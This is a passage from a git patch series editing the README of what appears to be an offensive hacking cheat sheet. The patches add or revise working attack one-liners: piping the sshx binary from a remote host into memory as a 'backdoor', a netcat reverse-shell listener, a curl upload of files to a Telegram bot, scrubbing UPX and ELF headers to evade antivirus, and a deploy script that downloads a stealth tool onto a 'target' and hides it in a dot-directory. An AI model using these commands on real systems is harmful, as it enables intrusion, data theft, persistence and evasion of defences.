'-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",@ARGV' -- "-q" 2>/dev/null|{ read x;echo "$x";}&) +echo $(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null|nohup perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",("-q")' 2>/dev/null|{ read x;echo "$x";}&) ``` From c60aa0d43feb24a5a0bee11b0b26d447b66b59f5 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 26 Feb 2025 09:04:03 +0000 Subject: [PATCH 20/24] Update README.md --- README.md | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 80da216..38958a1 100644 --- a/README.md +++ b/README.md @@ -1741,6 +1741,14 @@ LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/ys)" # Notice '/ys' in Access a remote shell from your web browser [https://sshx.io](https://sshx.io). +Pipe be sshx-backdoor directly into memory: +```shell +echo $(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null \ + |nohup perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",("-q")' 2>/dev/null \ + |{ read x;echo "$x";}&) +``` + +Or the lame way: ```shell curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null >.s \ && chmod 755 .s \ @@ -1748,11 +1756,6 @@ curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s; ``` -Or pipe directly into memory: -```shell -echo $(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null|nohup perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",("-q")' 2>/dev/null|{ read x;echo "$x";}&) -``` - **6.iii. authorized_keys** From c241d069e841a228ab29ac191e171c1bae7925a2 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 26 Feb 2025 18:26:06 +0000 Subject: [PATCH 21/24] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 38958a1..ae97f9d 100644 --- a/README.md +++ b/README.md @@ -1499,6 +1499,8 @@ See [6. Backdoors](#backdoor) for a 1-liner to deploy and access a fully functio **5.i.b. Reverse shell with Bash** +Tip: Use [https://www.revshells.com/](https://www.revshells.com/) 👌 + Start netcat to listen on port 1524 on your system: ```sh nc -nvlp 1524 From ed3ccd06a9b39d5824bebd30ee36b2b5ead6b359 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 26 Feb 2025 18:26:43 +0000 Subject: [PATCH 22/24] Update README.md --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ae97f9d..602a035 100644 --- a/README.md +++ b/README.md @@ -1491,6 +1491,9 @@ curl -sF document=@file.zip "https://api.telegram.org/bot/sendDocu --- ## 5. Reverse Shell / Dumb Shell + +Tip: Use [https://www.revshells.com/](https://www.revshells.com/) 👌 + **5.i.a. Reverse shell with gs-netcat (encrypted)** @@ -1499,8 +1502,6 @@ See [6. Backdoors](#backdoor) for a 1-liner to deploy and access a fully functio **5.i.b. Reverse shell with Bash** -Tip: Use [https://www.revshells.com/](https://www.revshells.com/) 👌 - Start netcat to listen on port 1524 on your system: ```sh nc -nvlp 1524 From 8b9516d1c6bcb6669b04b3c65ae4206f1ff20748 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 28 Feb 2025 08:52:11 +0000 Subject: [PATCH 23/24] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c130054..13cfae8 100644 --- a/README.md +++ b/README.md @@ -2122,7 +2122,7 @@ BIN="mybin" upx -qqq /bin/id -o "${BIN}" ``` -Cleanse the [UPX header](https://github.com/upx/upx/blob/devel/src/stub/src/include/header.S) and 2nd ELF header to fool the Anit-Virus: +Cleanse the [UPX header](https://github.com/upx/upx/blob/devel/src/stub/src/include/header.S) and 2nd ELF header to fool the Anti-Virus: ```shell perl -i -0777 -pe 's/^(.{64})(.{0,256})UPX!.{4}/$1$2\0\0\0\0\0\0\0\0/s' "${BIN}" perl -i -0777 -pe 's/^(.{64})(.{0,256})\x7fELF/$1$2\0\0\0\0/s' "${BIN}" @@ -2134,7 +2134,7 @@ cat "${BIN}" \ | perl -e 'local($/);$_=<>;s/(.*)(\$Info:[^\0]*)(.*)/print "$1";print "\0"x length($2); print "$3"/es;' \ | perl -e 'local($/);$_=<>;s/(.*)(\$Id:[^\0]*)(.*)/print "$1";print "\0"x length($2); print "$3"/es;' >"${BIN}.tmpupx" mv "${BIN}.tmpupx" "${BIN}" -grep -Eq "PROT_EXEC\|PROT_WRITE" "${BIN}" \ +grep -Eqm1 "PROT_EXEC\|PROT_WRITE" "${BIN}" \ && cat "${BIN}" | perl -e 'local($/);$_=<>;s/(.*)(PROT_EXEC\|PROT_WRI[^\0]*)(.*)/print "$1";print "\0"x length($2); print "$3"/es;' >"${BIN}.tmpupx" \ && mv "${BIN}.tmpupx" "${BIN}" perl -i -0777 -pe 's/UPX!/\0\0\0\0/sg' "${BIN}" From e39c14a2533096b60a711237fe68619f1373b844 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 3 Mar 2025 11:18:15 +0000 Subject: [PATCH 24/24] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 13cfae8..9453018 100644 --- a/README.md +++ b/README.md @@ -2289,7 +2289,7 @@ Deploy: Cut & paste the following onto the target and follow the instructions: ```sh command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \ && { mkdir -p ~/.config/.pty 2>/dev/null; :; } \ -&& curl -o ~/.config/.pty/pty -fsSL "https://bin.pkgforge.dev/$(uname -m)/Baseutils/util-linux/script" \ +&& curl -o ~/.config/.pty/pty -fsSL "https://bin.pkgforge.dev/$(uname -m)/script" \ && curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \ && chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \ && echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \